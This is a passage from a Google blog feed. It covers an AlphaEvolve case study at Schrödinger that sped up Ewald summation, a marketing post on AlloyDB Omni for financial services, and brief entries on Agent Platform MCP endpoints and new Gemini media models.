&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Lifecycle management for model endpoints&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;/mcp/models&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Model registry tools&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Model upload, registry, and deployment&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;/mcp/tuning&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Model fine-tuning tools&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finetuning job management and tracking&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;/mcp/evaluation&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Quality evaluation tools&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Automated model quality and instance evaluation&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;/mcp/prompts&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Prompt management tools&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Prompt engineering and versioning workflows&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Visit the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/reference/use-agent-platform-mcp"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Platform page&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to connect your favorite agent frameworks to the Agent Platform MCP server and start building today. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-enterprise-agent-platform-remote-mcp-server" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-30T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/ai-machine-learning/schrodinger-alphaevolve-molecular-discovery-accelerates-4x</id>
    <title>How Schrödinger sped up molecular discovery by 4x with Alphaevolve</title>
    <updated>2026-06-30T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Computational chemistry researchers have traditionally faced a frustrating trade-off when simulating molecular interactions: use fast classical force fields that sacrifice precision or rely on accurate quantum-mechanical methods that run too slowly on large jobs. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Machine-learned force fields (MLFFs) close that gap by training neural networks on high-fidelity quantum data. When it comes to modern drug discovery and materials design, though, there’s demand for even faster processing speeds to handle massive chemical libraries involved. To overcome such performance constraints, Schrödinger partnered with Google Cloud to deploy &lt;/span&gt;&lt;a href="https://deepmind.google/blog/alphaevolve-a-gemini-powered-coding-agent-for-designing-advanced-algorithms/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AlphaEvolve&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, an evolutionary AI coding agent developed by Google DeepMind that iteratively generates and refines algorithms to find the most efficient code path overcoming the algorithmic bottleneck.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;A collaborative duet with AlphaEvolve&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Schrödinger — a leader in developing scientific software for over three decades — identified two critical algorithms within their MLFF training pipeline that limited performance: neighbor list computation and Ewald summation. These algorithms aggregate data from atomic neighbors and calculate long-range potentials, but both became limiting factors in training and inference speed. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Schrödinger's primary technical goal was speeding up AI model training for energy and force calculations. Specifically, they targeted the Ewald summation, a critical but computationally demanding function used in molecular mechanics.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;The Ewald sum was the main performance constraint in Schrödinger's PyTorch code. It had no established vectorized algorithm and often relied on simple for-loops that ran slowly on large simulations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By incorporating AlphaEvolve into their models, the system could generate a batched implementation of the Ewald summation using parallel batch matrix multiplication. This would evolve the PyTorch code to outperform existing custom kernels.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Evaluation metrics&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Schrödinger used a rigorous multi-layered evaluation framework to confirm the evolved code was both performant and scientifically accurate:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Inverse time (primary metric): The core objective was to maximize throughput by reducing calculation time, from a baseline score of 7.9.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Functional correctness: All evolved programs had to pass a full test suite, including regression tests on complex systems such as disordered water models.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Success rate: This was measured by the share of programs that were both functionally correct and faster than the baseline.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“AlphaEvolve allows us to explore larger chemical spaces faster and more efficiently than ever before. Faster MLFF inference carries real business impact, shortening R&amp;amp;D cycles in drug discovery, catalyst design, and materials development, and enabling companies to screen molecular candidates in days rather than months.” &lt;/span&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;— Gabriel Marques, technical lead of machine learning, Schrödinger&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Results: a 4x speedup and breaking bottlenecks&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By applying AlphaEvolve, Schrödinger replaced simple for-loops in the Ewald summation code with parallel batch matrix multiplication. This optimization raised the program success rate from less than 1% (40 out of 5,000 evaluations) to more than 60%, while improving the performance metric from the baseline of 7.9 to nearly 30.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Optimizing these foundational algorithms delivered a 4x speedup in both MLFF training and inference. This acceleration lets researchers compress molecular screening timelines and directly benefits several key research areas:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Drug discovery: Identifying viable therapeutic candidates quickly to address urgent medical needs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Catalyst design: Developing efficient chemical processes for industrial applications.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Materials development: Designing next-generation materials with custom properties for electronics and energy storage.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The next evolution&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Schrödinger plans to apply this evolutionary approach to custom GPU kernels to test whether AI-generated code can outperform human-engineered implementations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Read the &lt;/span&gt;&lt;a href="https://storage.googleapis.com/deepmind-media/DeepMind.com/Blog/alphaevolve-a-gemini-powered-coding-agent-for-designing-advanced-algorithms/AlphaEvolve.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;full technical paper&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on AlphaEvolve to learn how evolutionary AI agents optimize scientific codebases, or contact the &lt;/span&gt;&lt;a href="https://cloud.google.com/resources/global-gen-ai-contact-sales"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud AI team&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to discuss accelerating your research workflows.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/ai-machine-learning/schrodinger-alphaevolve-molecular-discovery-accelerates-4x" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-30T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/databases/alloydb-omni-secure-hybrid-database-modernization-for-finance</id>
    <title>Modernizing financial services with deployment freedom and transformational AI with AlloyDB Omni</title>
    <updated>2026-06-30T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The financial services industry (FSI) operates under a unique set of non-negotiable requirements: the need for strict regulatory compliance, sub-millisecond transactional speeds, and security that verges on impenetrable. Historically, organizations have met these standards by relying on brittle, proprietary database systems, leaving them with massive technical debt, operational overhead, and vendor lock-in.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At the same time, financial services companies are facing a series of daunting challenges:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The licensing trap and technical debt:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Decades of reliance on legacy commercial databases have left institutions with skyrocketing maintenance costs and restrictive licenses that refuse to scale. In fact, a global investment bank might find that over 70% of its IT budget is swallowed up by decades-old COBOL core banking systems and siloed ledger databases—leaving virtually no capital to develop the real-time, AI-driven fraud detection tools their clients are actively demanding.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The tug of war between sovereignty and innovation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Emerging regulations like EMEA’s &lt;/span&gt;&lt;a href="https://www.eiopa.europa.eu/digital-operational-resilience-act-dora_en" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Digital Operational Resilience Act&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (DORA) and strict national data residency laws require institutions to maintain ironclad control over where their data lives. This often creates a massive barrier to public cloud adoption for sensitive workloads, effectively siloing a regional payment processor from modern AI tools simply because they cannot legally move transaction data to a public cloud for processing.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The "insights gap" in real-time operations:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; While agile fintech upstarts launch with flexible, cloud-native architectures, traditional firms struggle to turn vast data reserves into actionable intelligence. Their data is trapped in legacy environments that hit a performance ceiling during peak market volatility, leaving an investment firm struggling to scale its high-frequency trading ledgers when standard PostgreSQL or legacy systems max out.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As the industry enters the era of Agentic AI — where autonomous AI agents handle complex workflows like real-time risk assessment and automated trading — financial services firms must adopt a fundamentally new database strategy.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To overcome these entrenched challenges, they need to shift their strategy, moving away from proprietary databases that lock them in toward a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;hybrid, open-standards-based paradigm&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. This allows them to embrace the best of cloud-native innovation , like &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;empowering&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; real-time agentic AI workloads and edge computing , while maintaining control and residency of their own data on-premises.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud, we designed &lt;/span&gt;&lt;a href="https://cloud.google.com/products/alloydb"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB for PostgreSQL&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to unify operational data, real-time analytics, and generative AI into a single platform, and you can run it anywhere. Further, it specifically addresses the above mentioned FSI challenges directly through three guiding principles:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The licensing trap -&amp;gt; open standards:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; AlloyDB is 100% PostgreSQL-compatible, allowing institutions to modernize from expensive, legacy proprietary databases to an open platform that minimizes licensing headaches and vendor lock-in.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Sovereignty -&amp;gt; heterogeneous support:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; With AlloyDB Omni’s flexible deployment model, organizations can keep up with the complex topologies that characterize global banks, allowing mission-critical applications to run in a hybrid cloud, at the edge, or on-prem in air-gapped environments.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The insights gap -&amp;gt; battle-tested scale:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; By incorporating architectural lessons from Google's billion-user applications, the cloud-managed AlloyDB service delivers superior performance, running over 4x faster for transactional workloads than standard PostgreSQL. Crucially, the downloadable AlloyDB Omni engine brings this exact same high-concurrency scaling power straight to your local hardware—outperforming standard PostgreSQL by over 2x for transactions—while both deployment models accelerate real-time analytical queries by up to 100x.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Institutions are already realizing the benefits of this new approach:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/customers/cynergy-bank?e=0"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Cynergy Bank&lt;/strong&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;By migrating from on-prem SQL databases to AlloyDB, the bank successfully modernized a key element of&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;its infrastructure. This critical initiative reduced app account loading times to under three seconds and enabled the integration of data and AI, providing a more personal "human touch" to digital banking and financial services.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/databases/apex-fintech-solutions-boosts-processing-time/?e=0#:~:text=The%20AlloyDB%2Dbased%20solution%20has%20achieved%20a%2050%25,potential%20to%20migrate%20additional%20traditional%20PostgreSQL%20instances."&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Apex Fintech&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The company leveraged AlloyDB to speed up margin calculations by 50%, enabling them to calculate risk for 100,000 accounts in just one minute while eliminating the need for a separate analytical system.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To ensure financial institutions can leverage these exact same breakthrough database innovations anywhere—without being forced into a public cloud migration—we built &lt;/span&gt;&lt;a href="https://cloud.google.com/alloydb/omni?e=0&amp;amp;hl=en"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB Omni&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;to extend our signature kernel performance directly to your owned infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;AlloyDB Omni: Strong performance and deployment freedom&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether running mission-critical applications on-premises, at the edge, or across hybrid clouds, financial institutions shouldn't have to choose between deployment flexibility and database performance. AlloyDB Omni bridges this gap by bringing Google’s breakthrough kernel innovations directly to your infrastructure. By design, it delivers enterprise-grade capabilities across three core dimensions:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;True portability and modernization in place:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Take absolute control over your data residency. &lt;/span&gt;&lt;a href="https://clouddocs.devsite.corp.google.com/alloydb/omni/docs/choose-deployment" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Deploy&lt;/span&gt;&lt;/a&gt; &lt;span style="vertical-align: baseline;"&gt;AlloyDB Omni on-premises or at the edge to help comply with strict data sovereignty laws and regulations. This allows you to upgrade your legacy estates right where they live, avoiding the immense operational risk, latency, and vendor concentration risks of a forced public cloud migration.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Operational simplicity on your terms:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Manage your databases like any other modern application. AlloyDB Omni is deployable across containerized environments, bare metal, or VMs. By leveraging tools like our &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/omni/kubernetes/current/docs/overview"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Kubernetes Operator&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;to automate routine provisioning, backups, and failovers, your platform teams gain integrated, API-driven control that elevates the database into a first-class citizen of your infrastructure alongside compute and storage. For non-containerized setups, Omni can be downloaded as a standalone &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/omni/docs/linux-overview"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;RPM&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and managed with CLI or Ansible automation, and it is fully validated to run on &lt;/span&gt;&lt;a href="https://cloud.google.com/distributed-cloud"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Google Distributed Cloud&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (GDC) for the most restrictive air-gapped workloads.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Shattering the PostgreSQL performance ceiling:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; While standard PostgreSQL is highly trusted, high-concurrency financial workloads often hit a scaling wall. AlloyDB Omni breaks through these limits directly on your local hardware:&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Superior transactional scalability:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Delivers up to 2x faster transaction processing than standard PostgreSQL, ensuring payment processing and high-frequency trading ledgers maintain ultra-low latency even during volatile operational spikes.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Real-time analytics (HTAP):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; An intelligent, built-in columnar engine accelerates analytical queries by up to 100x. This enables instant, local business intelligence and reporting directly on live transactional data without the latency of moving it to a warehouse.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Secure, local AI transformation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Build fraud detection, risk modeling, or semantic search applications locally. AlloyDB Omni includes integrated &lt;/span&gt;&lt;a href="https://cloud.google.com/alloydb/ai?e=0"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB AI&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; vector capabilities—featuring a &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/how-scann-for-alloydb-vector-search-compares-to-pgvector-hnsw"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;ScaNN&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; index that is up to 10x faster and 4x more memory efficient than standard PostgreSQL's HNSW index. This allows you to scale generative AI apps while keeping sensitive financial data and foundation models strictly within your secured infrastructure boundaries.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Enterprise-grade security and compliance&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Security cannot be an afterthought. We built AlloyDB Omni to exceed the rigorous standards of the finance industry, offering a hardened posture out of the box. AlloyDB includes: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Granular access and auditing:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; AlloyDB Omni integrates with Active Directory for unified identity management and provides detailed audit logging to track every access event — essential for regulatory audits.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Compliance-ready infrastructure: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;By utilizing features like &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/omni/linux/current/docs/transparent-data-encryption-omni"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Transparent Data Encryption&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (TDE) at rest, AlloyDB Omni is specifically engineered to help you meet your regulatory compliance obligations.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By providing a platform that is secure by design and that can be flexibly deployed in a variety of configurations, AlloyDB Omni enables financial institutions to stop choosing between stability and innovation and start delivering both.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Next steps&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To learn more and get started, please visit &lt;/span&gt;&lt;a href="https://cloud.google.com/alloydb/omni"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;https://cloud.google.com/alloydb/omni&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. You can learn more from the AlloyDB Omni &lt;/span&gt;&lt;a href="https://cloud.google.com/alloydb/docs/omni"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AlloyDB Omni is covered by the Google Cloud support plan the customer has chosen for their Google Cloud account; more information on support can be found at &lt;/span&gt;&lt;a href="https://cloud.google.com/support"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;https://cloud.google.com/support&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Technology partners, system integrators and ISVs play an important role in helping customers modernize and build differentiated applications., We are extending the &lt;/span&gt;&lt;a href="https://cloud.google.com/alloydb/docs/cloud-ready/overview"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB Cloud Ready program&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to now include AlloyDB Omni and enable our partner ecosystem to bring the best of what AlloyDB Omni has to offer to their customers. Customers can trust these validated partner products to work well with AlloyDB Omni, and can focus their time on modernizing database workloads and applications that will drive value for their business. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Get started with AlloyDB Omni by &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/omni/kubernetes/current/docs/available-download-install-options"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;downloading and deploying&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in your preferred location, including on your laptop!&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/databases/alloydb-omni-secure-hybrid-database-modernization-for-finance" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-30T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-omni-flash-nano-banana-2-lite</id>
    <title>Start building with Nano Banana 2 Lite and Gemini Omni Flash</title>
    <updated>2026-06-30T16:00:00+00:00</updated>
    <content type="html">mp4 showing a title card reading "Build with our generative media models"</content>
    <link href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-omni-flash-nano-banana-2-lite" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-30T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/create-fully-native-and-editable-presentations-with-Gemini-in-Google-Slides.html</id>
    <title>Create fully native and editable presentations with Gemini in Google Slides</title>
    <updated>2026-06-30T15:02:27+00:00</updated>
